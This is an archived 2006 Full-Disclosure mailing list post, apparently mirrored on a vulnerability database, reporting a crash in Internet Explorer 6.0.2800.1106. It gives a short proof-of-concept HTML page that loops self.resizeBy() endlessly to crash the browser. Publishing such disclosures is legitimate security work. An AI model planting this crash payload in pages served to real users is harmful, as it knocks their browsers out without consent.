Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12832
HistoryMay 26, 2006 - 12:00 a.m.

[Full-disclosure] Internet Explorer Ver 6.0.2800.1106 vulnerability

2006-05-2600:00:00
vulners.com
5

Hi All,

IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html page.

the following is the code

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
var wwidth = (window.innerWidth)?window.innerWidth: ((document.all
)?document.body.offsetWidth:null);

while (wwidth)
{
self.resizeBy(-999999, -1);
}

</script>

</body>
</html>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

tested on windows 2000,windows XP

thank you

antar